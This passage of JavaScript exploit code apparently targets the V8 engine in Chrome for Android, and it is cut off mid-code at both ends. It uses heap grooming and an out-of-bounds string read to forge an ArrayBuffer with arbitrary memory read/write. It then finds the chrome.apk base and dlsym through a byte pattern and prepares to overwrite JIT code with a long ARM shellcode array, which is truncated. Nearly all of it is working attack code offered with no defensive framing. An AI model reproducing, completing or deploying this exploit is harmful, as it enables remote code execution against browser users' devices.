objsInNewSpace[i]=(getObjAddr(xx)&0xfff00000)>>>0;\r\n //\u4f7fnewspace\u66f4\u79bb\u6563\r\n new Uint8Array(0x100000-0x500);\r\n new Uint8Array(0x100000-0x500);\r\n }\r\n function compareNumbers(a, b) {\r\n return a - b;\r\n }\r\n objsInNewSpace = Array.from(new Set(objsInNewSpace));\r\n objsInNewSpace = objsInNewSpace.sort(compareNumbers);\r\n return objsInNewSpace;\r\n}\r\n\r\n\r\nprint(\"begin get new space address\");\r\nvar objsInNewSpace = getNewSpaceAddrs();\r\nwhile(objsInNewSpace.length<16){\r\n objsInNewSpace = getNewSpaceAddrs();\r\n print(\"new space addresses\");\r\n pArrayInHex(objsInNewSpace);\r\n}\r\n\r\ntry{\r\nsprayVM();\r\n}catch(e){}\r\n\r\nvar selectedTrunk = 0;\r\nvar selectedStr = \"\";\r\nfunction bruteForceFengShui(){\r\n var huge_str = \"x\".repeat(0x100000-0x9000);//-0x9000\r\n huge_str +=\"%\";\r\n var hold = new Array(100);\r\n //var holdaddress = new Array(100);\r\n for(var i=0;;i++){\r\n var large = escape(huge_str);\r\n var addr = getObjAddr(large);\r\n //console.log(addr.toString(16) + \" \"+i);\r\n if(i<hold.length){\r\n hold[i]=large;\r\n //holdaddress[i]=addr;\r\n }\r\n addr=(addr&0xfff00000)>>>0;\r\n addr = addr-0x100000;\r\n if(objsInNewSpace.indexOf(addr)!=-1){\r\n selectedTrunk = addr;\r\n selectedStr = large;\r\n abarr.fill(1);\r\n hold.fill(1);\r\n //holdaddress.fill(1);\r\n break;\r\n }\r\n if(i===150){\r\n /*i=0;\r\n print(\"tried 200 times\");\r\n abarr.fill(1);\r\n try{\r\n sprayVM();\r\n }catch(e){};*/\r\n postMessage(false);\r\n close();\r\n throw \"exceed limits\";\r\n }\r\n }\r\n}\r\nbruteForceFengShui();\r\n//to avoid allocate memory latter, initilize here\r\nvar nextTrunk = selectedTrunk + 0x100000;\r\n\r\n//\u751f\u6210\u4e00\u5757\u8db3\u591f\u5927\u7684\u53ef\u8bfb\u5199\u5185\u5b58\r\nvar huge_str = \"eval('');\";\r\n//8000\u4e0d\u80fd\u592a\u5927\uff0c\u592a\u5927\u4f1a\u4f7fnew_space\u589e\u5927\r\nfor(var i=0;i<8000;i++) huge_str += 'a.a;';\r\nhuge_str += \"return 10;\";\r\nvar huge_func = new Function('a',huge_str);\r\nhuge_func({});\r\n\r\nfunction fillNewSpace(origObj){\r\n //first object in new space at 0x8100, new spaces layout\r\n //0x40000\r\n //0x37f00\r\n //.....\r\n //0x40000\r\n var gap = \"g\".repeat(0x37f00-12-3);//12 is head of string,3 %25\r\n var gap = gap+\"%\";\r\n //flat gap\r\n gap.substr(0,100);\r\n var fillstr = \"%20a\".repeat((0x40000-12)/4);\r\n fillstr = escape(fillstr);\r\n var addr=0;\r\n for(var i=0;i<0x100;i++){\r\n addr = getObj24BitsAddr(origObj);\r\n if((addr&0xfffff)===0x8101)\r\n origObj=escape(gap);\r\n else\r\n origObj=unescape(fillstr);\r\n }\r\n}\r\n\r\nfunction findNewSpace(){\r\n var kMaxRegularHeapObjectSize =523776;// 507136;\r\n var str=\"1\".repeat(kMaxRegularHeapObjectSize-0x2000);\r\n str+=\"%\";\r\n for(var i=0;;i++){\r\n var xx=escape(str);\r\n var straddr = getObjAddr(xx);\r\n addr=(straddr&0xfff00000)>>>0;\r\n if(addr===selectedTrunk){\r\n print(\"good state \"+straddr.toString(16));\r\n break;\r\n }\r\n }\r\n}\r\n\r\nfunction myencode(str){\r\n var arr = [];\r\n for(var i=0;i<str.length;i++){\r\n if(i%2==1)\r\n arr.push(str.charCodeAt(i));\r\n else{\r\n arr.push(37);//%\r\n var hexstr = (str.charCodeAt(i)+0x100).toString(16).substr(-2);\r\n arr.push(hexstr.charCodeAt(0));\r\n arr.push(hexstr.charCodeAt(1));\r\n }\r\n }\r\n return String.fromCharCode.apply(null,arr);\r\n}\r\n\r\nvar dArray = [];\r\nvar index = (0x8100-36)*2;\r\nfor(var i=0;i<0x20000/8;i++){\r\n dArray[i]=str_to_double(\"%03x%03x\");\r\n}\r\n\r\nvar occulen = 0;\r\nvar i = 0;\r\nvar savedChunk = new Uint8Array(0x8100);\r\nvar hiddenValue = getHiddenValue();\r\nvar arr=[];\r\nfillNewSpace(new String);\r\nfindNewSpace();\r\nvar classStr = 'class x extends Array{}';\r\nfor(var i=0;i<classStr.length;i++){\r\n arr[i]=classStr.charCodeAt(i);\r\n}\r\nvar magicStr = String.fromCharCode(0x86,0x24);\r\nclassStr=String.fromCharCode.apply(null,arr);\r\nvar ab = new ArrayBuffer(0x1243);\r\nvar fun = eval(classStr); \r\nObject.assign(fun,hiddenValue);\r\nvar oobStr = fun.toString();\r\n\r\n/*(gdb) x/20xw 0x5600c45c array buffer layout\r\n * 0x5600c45c: 0x4b009a9d 0x41008125 0x41008125 0x00000020\r\n * 0x5600c46c: 0x09fda368 0x00000004 0x00000000 0x00000000\r\n */\r\n//overwrite huge string as array buffer\r\nvar abLengthIndex = oobStr.indexOf(magicStr);\r\nvar strArrayBuffer = oobStr.substr(abLengthIndex-12,32);\r\n//replace the byteLength\r\nvar LengthAddr = getObjAddr(lengthInOldSpace);\r\nvar strLength = String.fromCharCode(0xff&LengthAddr,(0xff00&LengthAddr)>>8,(0xff0000&LengthAddr)>>16,(0xff000000&LengthAddr)>>24);\r\nvar strBase = \"\\x00\\x00\\x00\\x00\";\r\nstrArrayBuffer = strArrayBuffer.substr(0,12)+strLength+strBase+strArrayBuffer.substr(20,12);\r\nstrArrayBuffer = myencode(strArrayBuffer);\r\nfor(var i=0;i<strArrayBuffer.length/8;i++){\r\n var d = strArrayBuffer.substr(i*8,8);\r\n dArray[index/8+i] = str_to_double(d);\r\n}\r\n\r\nvar classStrAddr = getObjAddr(classStr)>>>0;\r\n//set read position\r\nvar readOffset = 0x100000-((classStrAddr-1)&0xfffff)-12-0x40000;//12 string head\r\n//length control the length of unscaped string, generated string has 12 bytes head\r\n//left 0x1000*2 bytes to avoid gc\r\nvar subOobStr = oobStr.substr(readOffset,0x40000-24-0x2000);\r\n\r\n//save the the chunk head to be corrupted\r\nvar nextThunkOffset = 0x100000-((classStrAddr-1)&0xfffff)-12;\r\nvar savedThunkStr = oobStr.substr(nextThunkOffset,0x8100);\r\nfor(var i =0;i<savedThunkStr.length;i++){\r\n savedChunk[i] = savedThunkStr.charCodeAt(i);\r\n}\r\n\r\nvar pos1=new String;\r\nvar pos1addr = getObj24BitsAddr(pos1)-1;\r\n\r\n//0x10 size of JSArray, 0x10 size of String head, 8 ALLOCATION_MEMENTO_TYPE 8 fixedarray \r\nocculen =0x100000-((pos1addr+0x10+0x10+0x8+0x8)&0xfffff);\r\n//minus the length of double array\r\nif(occulen<0x40000+16+8)\r\n throw \"no enough room\";\r\nocculen = occulen - 0x40000-16-8;//16 size of JSArray, 8 fixedarray\r\nif(occulen%4!==0)\r\n throw \"length don't align\";\r\nvar arrocc=new Array((occulen/4)); \r\n//set unescape write position\r\nvar occDoubleArray = dArray.concat();\r\n\r\nvar b=unescape(subOobStr);\r\n//restore the corrupted chunk head\r\nvar u8 = new Uint8Array(selectedStr,nextTrunk,0x8100);\r\nfor(var i=0;i<savedChunk.length;i++){\r\n u8[i] = savedChunk[i];\r\n}\r\n\r\nprint(\"long string allocated at \"+classStrAddr.toString(16));\r\nif(typeof(selectedStr)===\"string\"){\r\n print(\"overwrite failed\");\r\n postMessage(false);\r\n close();\r\n return;\r\n //throw \"overwrite failed\";\r\n}\r\nvar fakeab = selectedStr;\r\nprint(\"faked array buffer byte length is \"+fakeab.byteLength.toString(16));\r\nvar globaldv = new Uint32Array(fakeab);\r\n\r\nfunction read_uint32(from_address){\r\n var u32 = globaldv[(from_address/4)>>>0];\r\n return u32>>>0;\r\n}\r\n\r\n\r\nfunction read_uint8(from_address){\r\n from_address = from_address>>>0;\r\n var index = (from_address/4)>>>0;\r\n var mask = from_address%4;\r\n var u32 = globaldv[index];\r\n u32 = u32<<8*(3-mask);\r\n return u32>>>24;\r\n}\r\n\r\nfunction read_uint32_unalign(from_address){\r\n var u32 = 0;\r\n for(var i=3;i>=0;i--){\r\n var u8 = read_uint8(from_address+i);\r\n u32 = u32*0x100+u8;\r\n }\r\n return u32>>>0;\r\n}\r\n\r\n//rw to execute\r\n//get function point of v8::internal::Accessors::ReconfigureToDataProperty\r\nfunction getFixedFunctionPoint(fakeab){\r\n var FunctionAddress = getObjAddr(Function);\r\n var u32 = new Uint32Array(fakeab,FunctionAddress-1,0x1000);\r\n var map = u32[0];\r\n u32 = new Uint32Array(fakeab,map-1,0x1000);\r\n //instance descriptors\r\n var descriptors = u32[7];\r\n u32 = new Uint32Array(fakeab,descriptors-1,0x1000);\r\n var lengthAccessorInfo = u32[6];\r\n u32 = new Uint32Array(fakeab,lengthAccessorInfo-1,0x1000);\r\n var setterForeign = u32[4];\r\n u32 = new Uint32Array(fakeab,setterForeign-1,0x1000);\r\n var functionPoint = u32[1];\r\n return functionPoint-1;\r\n}\r\n\r\nvar funPoint = getFixedFunctionPoint(fakeab);\r\nprint(\"ReconfigureToDataProperty at\"+funPoint.toString(16));\r\nvar pattern=[0x03,0x46,0x18,0xb1,0x20,0x46,0x98,0x47,0x04,0x46];//get_elf_hwcap_from_getauxval\r\n\r\nvar point = ((funPoint&~0xfff)-0xdb6000)>>>0;//cf0000\r\nprint(\"chrome.apk base at \"+point.toString(16));\r\n\r\nfunction find(startAddr,len,pattern){\r\n for(var i=0; i<(len-pattern.length); i++ ) {\r\n for(var j=0;j<pattern.length;j++){\r\n var temp = read_uint8(startAddr+i+j);\r\n //print(temp.toString(16));\r\n if(temp!=pattern[j]) break;\r\n }\r\n if(j==pattern.length) return startAddr+i;\r\n }\r\n print(\"find failed\");\r\n}\r\nvar pattern_position=find(point,0x10000000,pattern);\r\n\r\nprint(\"find pattern at \"+to_hex(pattern_position));\r\n\r\n\r\n\r\n\r\n\r\nfunction get_dest_from_blx(addr) {\r\n var val = read_uint32_unalign(addr);\r\n var s = (val & 0x400) >> 10;\r\n var i1 = 1 - (((val & 0x20000000) >> 29) ^ s);\r\n var i2 = 1 - (((val & 0x8000000) >> 27) ^ s);\r\n var i10h = val & 0x3ff;\r\n var i10l = (val & 0x7fe0000) >> 17;\r\n var off = ((s * 0xff) << 24) | (i1 << 23) | (i2 << 22) | (i10h << 12) | (i10l << 2);\r\n return ((addr + 4) & ~3) + off;\r\n}\r\n\r\nfunction backup_original_code(start_address){\r\n var backup_arr = [];\r\n set_access_address(start_address);\r\n var u8arr=new Uint8Array(faked_ab);\r\n for(var i=0;i<shellcode.length+4096;i++){\r\n backup_arr[i]=u8arr[i];\r\n }\r\n return backup_arr;\r\n}\r\n\r\nfunction restore_original_code(start_address,backup_arr){\r\n set_access_address(start_address);\r\n var u8arr=new Uint8Array(faked_ab);\r\n for(var i=0;i<shellcode.length+4096;i++){\r\n u8arr[i]=backup_arr[i];\r\n }\r\n}\r\n\r\n\r\nhuge_func({});\r\nprint(\"blx instruction content is \"+to_hex(read_uint32_unalign(pattern_position-4)));\r\nvar dlsym_addr = get_dest_from_blx(pattern_position-4);\r\nprint(\"dlsym address is \"+to_hex(dlsym_addr));\r\nvar huge_func_address = getObjAddr(huge_func)-1;\r\nprint(\"huge func address is \"+to_hex(huge_func_address));\r\nfor(var i=0;i<20;i++){\r\n print(to_hex(read_uint32(huge_func_address+i*4)));\r\n}\r\nvar huge_func_code_entry = read_uint32(huge_func_address+7*4);//dynamic kCodeEntryOffset 3*4\r\nprint(\"huge func code entry is \"+to_hex(huge_func_code_entry));\r\nprint(to_hex(read_uint32(huge_func_code_entry)));\r\n\r\n//var so_str= \"\";\r\nvar shellcode = [0xf0,0x4f,0x2d,0xe9,0x79,0x30,0xa0,0xe3,0x8c,0x0b,0xdf,0xed,0x4b,0xdf,0x4d,0xe2,0x61,0x80,0xa0,0xe3,0x00,0x60,0xa0,0xe3,0x73,0x10,0xa0,0xe3,0x74,0x20,0xa0,0xe3,0x5f,0x90,0xa0,0xe3,0x61,0x30,0xcd,0xe5,0x65,0xa0,0xa0,0xe3,0x6d,0xb0,0xa0,0xe3,0x5b,0x30,0xcd,0xe5,0x6e,0xc0,0xa0,0xe3,0x6c,0x30,0xa0,0xe3,0xfa,0x80,0xcd,0xe5,0x64,0x70,0xa0,0xe3,0x72,0x50,0xa0,0xe3,0x60,0x10,0xcd,0xe5,0x6f,0x40,0xa0,0xe3,0x69,0xe0,0xa0,0xe3,0x62,0x10,0xcd,0xe5,0x67,0x80,0xa0,0xe3,0x5a,0x10,0xcd,0xe5,0x18,0x00,0x8d,0xe5,0x70,0x00,0xa0,0xe3,0x63,0x20,0xcd,0xe5,0x0a,0x21,0xcd,0xe5,0x64,0xa0,0xcd,0xe5,0x65,0xb0,0xcd,0xe5,0x5c,0xb0,0xcd,0xe5,0xf8,0x90,0xcd,0xe5,0xf9,0x90,0xcd,0xe5,0x01,0x91,0xcd,0xe5,0x05,0x91,0xcd,0xe5,0x20,0x90,0xa0,0xe3,0xfb,0xc0,0xcd,0xe5,0x09,0xc1,0xcd,0xe5,0xfc,0x70,0xcd,0xe5,0x00,0x71,0xcd,0xe5,0x58,0x70,0xcd,0xe5,0x78,0x70,0xa0,0xe3,0xfd,0x50,0xcd,0xe5,0x07,0x51,0xcd,0xe5,0xfe,0x40,0xcd,0xe5,0x03,0x41,0xcd,0xe5,0xff,0xe0,0xcd,0xe5,0x08,0xe1,0xcd,0xe5,0x02,0x31,0xcd,0xe5,0x59,0x30,0xcd,0xe5,0x66,0x60,0xcd,0xe5,0x0b,0x61,0xcd,0xe5,0x5d,0x60,0xcd,0xe5,0x04,0x81,0xcd,0xe5,0x25,0x80,0xa0,0xe3,0x1c,0x0b,0xcd,0xed,0xeb,0x10,0xcd,0xe5,0x18,0x10,0x9d,0xe5,0x9c,0x20,0xcd,0xe5,0x9f,0x20,0xcd,0xe5,0x18,0x20,0x9d,0xe5,0x98,0xb0,0xcd,0xe5,0x2c,0xb0,0xa0,0xe3,0x9d,0xa0,0xcd,0xe5,0xe8,0xe0,0xcd,0xe5,0x63,0xe0,0xa0,0xe3,0xe9,0xc0,0xcd,0xe5,0xe8,0xc0,0x8d,0xe2,0xed,0xa0,0xcd,0xe5,0x70,0xa0,0x8d,0xe2,0xee,0x30,0xcd,0xe5,0xef,0x30,0xcd,0xe5,0x68,0x30,0xa0,0xe3,0x34,0xc0,0x8d,0xe5,0x9e,0xe0,0xcd,0xe5,0xec,0x30,0xcd,0xe5,0x06,0x01,0xcd,0xe5,0x99,0x00,0xcd,0xe5,0x06,0x00,0xa0,0xe1,0x9a,0x50,0xcd,0xe5,0x00,0x50,0x91,0xe5,0x06,0x10,0xa0,0xe1,0x9b,0x40,0xcd,0xe5,0x04,0x40,0x92,0xe5,0x38,0xa0,0x8d,0xe5,0xea,0x90,0xcd,0xe5,0xf0,0x90,0xcd,0xe5,0xf1,0x80,0xcd,0xe5,0xf4,0x80,0xcd,0xe5,0xf2,0x70,0xcd,0xe5,0xf5,0x70,0xcd,0xe5,0xf3,0xb0,0xcd,0xe5,0xa0,0x60,0xcd,0xe5,0xf6,0x60,0xcd,0xe5,0x35,0xff,0x2f,0xe1,0x10,0x00,0x8d,0xe5,0x58,0x10,0x8d,0xe2,0x34,0xff,0x2f,0xe1,0x1c,0x00,0x8d,0xe5,0xf8,0x10,0x8d,0xe2,0x10,0x00,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x39,0xff,0x2f,0xe1,0x18,0x80,0x9d,0xe5,0x30,0x00,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x70,0x10,0x8d,0xe2,0x30,0xb0,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x04,0x70,0x98,0xe5,0x00,0x30,0x98,0xe5,0x00,0x70,0x8d,0xe5,0x3b,0xff,0x2f,0xe1,0x60,0x10,0x8d,0xe2,0x1c,0x50,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x35,0xff,0x2f,0xe1,0x00,0x20,0xa0,0xe1,0x70,0x10,0x8d,0xe2,0x02,0x30,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0x00,0x20,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x98,0x10,0x8d,0xe2,0x1c,0x40,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x00,0xa0,0xa0,0xe1,0x18,0x00,0x9d,0xe5,0x07,0x20,0xa0,0xe3,0x0b,0x1a,0xa0,0xe3,0x10,0x50,0x90,0xe5,0xff,0xce,0xc5,0xe3,0x05,0x4a,0x85,0xe2,0x0f,0x30,0xcc,0xe3,0x01,0x0a,0x83,0xe2,0x3a,0xff,0x2f,0xe1,0xbc,0x72,0xd5,0xe1,0x1c,0x90,0x95,0xe5,0x06,0x00,0x57,0xe1,0x09,0x20,0x85,0xe0,0x06,0x00,0x00,0x1a,0x1b,0x00,0x00,0xea,0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x00,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0x15,0x00,0x00,0x2a,0x00,0xe0,0x92,0xe5,0x01,0x00,0x5e,0xe3,0xf8,0xff,0xff,0x1a,0x10,0x80,0x92,0xe5,0x00,0x00,0x58,0xe3,0xf5,0xff,0xff,0x0a,0x00,0x00,0xa0,0xe3,0x04,0x70,0x92,0xe5,0x00,0xb0,0x85,0xe0,0x00,0xa0,0x84,0xe0,0x08,0x10,0x92,0xe5,0x01,0x00,0x80,0xe2,0x07,0xc0,0xdb,0xe7,0x01,0xc0,0xca,0xe7,0x10,0x30,0x92,0xe5,0x03,0x00,0x50,0xe1,0xf5,0xff,0xff,0x3a,0xbc,0x72,0xd5,0xe1,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0xe9,0xff,0xff,0x3a,0x5f,0xe0,0xa0,0xe3,0x1f,0x0b,0x1f,0xed,0x61,0xb0,0xa0,0xe3,0x72,0x60,0xa0,0xe3,0x00,0x90,0xa0,0xe3,0x10,0x00,0x9d,0xe5,0x64,0xa0,0xa0,0xe3,0x74,0x70,0xa0,0xe3,0x10,0xe1,0xcd,0xe5,0x6e,0x80,0xa0,0xe3,0x69,0x30,0xa0,0xe3,0x11,0xe1,0xcd,0xe5,0x6f,0xc0,0xa0,0xe3,0x6c,0x20,0xa0,0xe3,0x19,0xe1,0xcd,0xe5,0x1d,0xe1,0xcd,0xe5,0x67,0xe0,0xa0,0xe3,0x1e,0x0b,0x8d,0xed,0x12,0xb1,0xcd,0xe5,0x70,0xb0,0xa0,0xe3,0x11,0x1e,0x8d,0xe2,0x14,0xa1,0xcd,0xe5,0x18,0xa1,0xcd,0xe5,0x15,0x61,0xcd,0xe5,0x1f,0x61,0xcd,0xe5,0x16,0xc1,0xcd,0xe5,0x1b,0xc1,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x17,0x31,0xcd,0xe5,0x20,0x31,0xcd,0xe5,0x1a,0x21,0xcd,0xe5,0x1c,0xe1,0xcd,0xe5,0x1e,0xb1,0xcd,0xe5,0x6d,0xb0,0xa0,0xe3,0x13,0x81,0xcd,0xe5,0x21,0x81,0xcd,0xe5,0x22,0x71,0xcd,0xe5,0x23,0x91,0xcd,0xe5,0x3c,0xff,0x2f,0xe1,0x63,0x30,0xa0,0xe3,0x70,0x20,0xa0,0xe3,0x14,0x00,0x8d,0xe5,0x73,0xe0,0xa0,0xe3,0x68,0x10,0x8d,0xe2,0x6a,0x60,0xcd,0xe5,0x6d,0x20,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x68,0xe0,0xcd,0xe5,0x10,0x00,0x9d,0xe5,0x6b,0x30,0xcd,0xe5,0x6c,0xb0,0xcd,0xe5,0x69,0x70,0xcd,0xe5,0x6e,0x90,0xcd,0xe5,0x3c,0xff,0x2f,0xe1,0x20,0xc0,0x95,0xe5,0xb0,0x90,0xcd,0xe5,0x78,0x20,0xa0,0xe3,0xb2,0xe3,0xd5,0xe1,0x25,0x10,0xa0,0xe3,0x2c,0x30,0xa0,0xe3,0xa9,0x20,0xcd,0xe5,0x00,0xb0,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0xa8,0x10,0xcd,0xe5,0x0c,0xc0,0x85,0xe0,0xab,0x10,0xcd,0xe5,0x0e,0xe1,0x8e,0xe0,0xae,0x10,0xcd,0xe5,0x02,0x10,0x8d,0xe0,0x20,0xc0,0x8d,0xe5,0x20,0xc0,0x95,0xe5,0xac,0x20,0xcd,0xe5,0xaf,0x20,0xcd,0xe5,0xa8,0x20,0x8d,0xe2,0xaa,0x30,0xcd,0xe5,0x8e,0xe1,0x8c,0xe0,0xad,0x30,0xcd,0xe5,0x05,0x30,0xa0,0xe1,0x05,0xc0,0x8e,0xe0,0x10,0xe0,0x9c,0xe5,0x00,0xc0,0x8d,0xe5,0x0e,0xc0,0x85,0xe0,0x24,0xc0,0x8d,0xe5,0x04,0xc0,0x8d,0xe5,0x14,0xc0,0x9d,0xe5,0x3c,0xff,0x2f,0xe1,0x73,0xe0,0xa0,0xe3,0x6d,0x00,0xa0,0xe3,0x89,0xa0,0xcd,0xe5,0x67,0xc0,0xa0,0xe3,0x2e,0x30,0xa0,0xe3,0x91,0xa0,0xcd,0xe5,0x79,0x20,0xa0,0xe3,0x65,0x10,0xa0,0xe3,0x8c,0xe0,0xcd,0xe5,0x8e,0x00,0xcd,0xe5,0x6c,0x00,0xa0,0xe3,0x94,0xe0,0xcd,0xe5,0x6f,0xe0,0xa0,0xe3,0x51,0xc0,0xcd,0xe5,0x70,0xc0,0xa0,0xe3,0x96,0x60,0xcd,0xe5,0x52,0xe0,0xcd,0xe5,0x5f,0xe0,0xa0,0xe3,0xb5,0x60,0xcd,0xe5,0xb7,0x00,0xcd,0xe5,0xb9,0xc0,0xcd,0xe5,0x69,0xc0,0xa0,0xe3,0xba,0x00,0xcd,0xe5,0xc1,0x60,0xcd,0xe5,0x8b,0x80,0xcd,0xe5,0x8f,0x90,0xcd,0xe5,0x93,0x80,0xcd,0xe5,0x95,0x70,0xcd,0xe5,0x97,0x90,0xcd,0xe5,0x53,0x70,0xcd,0xe5,0x54,0x90,0xcd,0xe5,0xbb,0x70,0xcd,0xe5,0xbc,0x90,0xcd,0xe5,0x88,0x30,0xcd,0xe5,0x90,0x30,0xcd,0xe5,0x50,0x30,0xcd,0xe5,0xb4,0x30,0xcd,0xe5,0xb8,0x30,0xcd,0xe5,0xc0,0x30,0xcd,0xe5,0x8a,0x20,0xcd,0xe5,0x8d,0x20,0xcd,0xe5,0x92,0x20,0xcd,0xe5,0xb6,0x10,0xcd,0xe5,0xc2,0x10,0xcd,0xe5,0xc3,0x00,0xcd,0xe5,0xb0,0x03,0xd5,0xe1,0xd1,0xe0,0xcd,0xe5,0x61,0xe0,0xa0,0xe3,0xc5,0xa0,0xcd,0xe5,0xd3,0x60,0xcd,0xe5,0xd4,0x60,0xcd,0xe5,0x09,0x00,0x50,0xe1,0xd9,0xa0,0xcd,0xe5,0x6c,0xa0,0xa0,0xe3,0xde,0x60,0xcd,0xe5,0xe2,0x60,0xcd,0xe5,0x6f,0x60,0xa0,0xe3,0xc4,0x30,0xcd,0xe5,0xc6,0x20,0xcd,0xe5,0xc7,0x80,0xcd,0xe5,0xc8,0x90,0xcd,0xe5,0xcc,0x30,0xcd,0xe5,0xcd,0xc0,0xcd,0xe5,0xce,0x80,0xcd,0xe5,0xcf,0xc0,0xcd,0xe5,0xd0,0x70,0xcd,0xe5,0xd2,0xe0,0xcd,0xe5,0xd5,0xe0,0xcd,0xe5,0xd6,0x20,0xcd,0xe5,0xd7,0x90,0xcd,0xe5,0xd8,0x30,0xcd,0xe5,0xda,0xe0,0xcd,0xe5,0xdb,0x70,0xcd,0xe5,0xdc,0xe0,0xcd,0xe5,0xdd,0x30,0xcd,0xe5,0xdf,0x10,0xcd,0xe5,0xe0,0xa0,0xcd,0xe5,0xe1,0x30,0xcd,0xe5,0xe3,0x60,0xcd,0xe5,0xe4,0x90,0xcd,0xe5,0xa6,0x00,0x00,0x0a,0xcc,0xa0,0x8d,0xe2,0xd8,0x60,0x8d,0xe2,0x20,0x70,0x9d,0xe5,0x88,0x20,0x8d,0xe2,0x90,0x30,0x8d,0xe2,0x20,0x90,0x8d,0xe5,0x2c,0x90,0x8d,0xe5,0x09,0x80,0xa0,0xe1,0x50,0x00,0x8d,0xe2,0xb4,0xc0,0x8d,0xe2,0xc0,0xe0,0x8d,0xe2,0x40,0xa0,0x8d,0xe5,0x48,0x60,0x8d,0xe5,0x03,0xa0,0xa0,0xe1,0x24,0x60,0x9d,0xe5,0x44,0x90,0x8d,0xe5,0x24,0x90,0x8d,0xe5,0x02,0x90,0xa0,0xe1,0x14,0x00,0x8d,0xe5,0x28,0xc0,0x8d,0xe5,0x3c,0xe0,0x8d,0xe5,0x4c,0x40,0x8d,0xe5,0x00,0x40,0x97,0xe5,0x09,0x10,0xa0,0xe1,0x04,0x40,0x86,0xe0,0x04,0x00,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x24,0x70,0x8d,0x05,0x1e,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x0a,0x10,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x2c,0x70,0x8d,0x05,0x18,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x50,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x13,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xb4,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x20,0x70,0x8d,0x05,0x0d,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xc0,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x44,0x70,0x8d,0x05,0x07,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xcc,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x02,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xd8,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0xb0,0x13,0xd5,0xe1,0x01,0x80,0x88,0xe2,0x28,0x70,0x87,0xe2,0x01,0x00,0x58,0xe1,0xd3,0xff,0xff,0xba,0x4c,0x40,0x9d,0xe5,0x44,0x90,0x9d,0xe5,0x24,0xa0,0x9d,0xe5,0x20,0x20,0x9d,0xe5,0x2c,0x30,0x9d,0xe5,0x20,0xc0,0x9d,0xe5,0x14,0xe0,0x92,0xe5,0x10,0x10,0x93,0xe5,0x10,0x30,0x9a,0xe5,0x10,0x60,0x9c,0xe5,0xae,0x21,0xb0,0xe1,0x01,0x70,0x85,0xe0,0x03,0xe0,0x85,0xe0,0x06,0x60,0x85,0xe0,0x1b,0x00,0x00,0x0a,0x00,0x80,0xa0,0xe3,0x24,0xb0,0x8d,0xe5,0x1c,0xb0,0x9d,0xe5,0x1c,0x90,0x8d,0xe5,0x08,0x90,0xa0,0xe1,0x20,0x80,0x9d,0xe5,0x20,0xa0,0x8d,0xe5,0x06,0xa0,0xa0,0xe1,0x0e,0x60,0xa0,0xe1,0x14,0x50,0x8d,0xe5,0x04,0x20,0x9a,0xe5,0x01,0x90,0x89,0xe2,0x08,0xa0,0x8a,0xe2,0x08,0x50,0x1a,0xe5,0x10,0x00,0x9d,0xe5,0x52,0xe4,0xef,0xe7,0x0e,0x12,0x96,0xe7,0x01,0x10,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x05,0x00,0x84,0xe7,0x14,0x30,0x98,0xe5,0xa3,0x01,0x59,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x50,0x9d,0xe5,0x06,0xe0,0xa0,0xe1,0x24,0xb0,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x20,0xa0,0x9d,0xe5,0x14,0xc0,0x99,0xe5,0x10,0x20,0x99,0xe5,0xac,0x11,0xb0,0xe1,0x00,0x10,0xa0,0x13,0x02,0x50,0x85,0xe0,0x01,0x00,0xa0,0x11,0x0c,0x00,0x00,0x0a,0x01,0x30,0xa0,0xe1,0x01,0x00,0x80,0xe2,0x05,0xc0,0xb3,0xe7,0x08,0x10,0x81,0xe2,0x04,0x20,0x93,0xe5,0x52,0x34,0xef,0xe7,0x03,0x22,0x8e,0xe0,0x04,0x30,0x92,0xe5,0x04,0x20,0x83,0xe0,0x04,0x20,0x8c,0xe7,0x14,0xc0,0x99,0xe5,0xac,0x01,0x50,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x00,0x9a,0xe5,0x2b,0x1b,0x9f,0xed,0x20,0x22,0xb0,0xe1,0x20,0x1b,0x8d,0xed,0x0e,0x80,0xa0,0x11,0x00,0x60,0xa0,0x13,0x80,0x50,0x8d,0x12,0x04,0x00,0x00,0x1a,0x0d,0x00,0x00,0xea,0x14,0x90,0x9a,0xe5,0x10,0x80,0x88,0xe2,0x29,0x02,0x56,0xe1,0x09,0x00,0x00,0x2a,0x00,0xe0,0x98,0xe5,0x05,0x10,0xa0,0xe1,0x01,0x60,0x86,0xe2,0x0e,0x00,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0xf4,0xff,0xff,0x1a,0x04,0x70,0x98,0xe5,0x07,0x40,0x84,0xe0,0x01,0x00,0x00,0xea,0xcc,0x4c,0x0c,0xe3,0x14,0x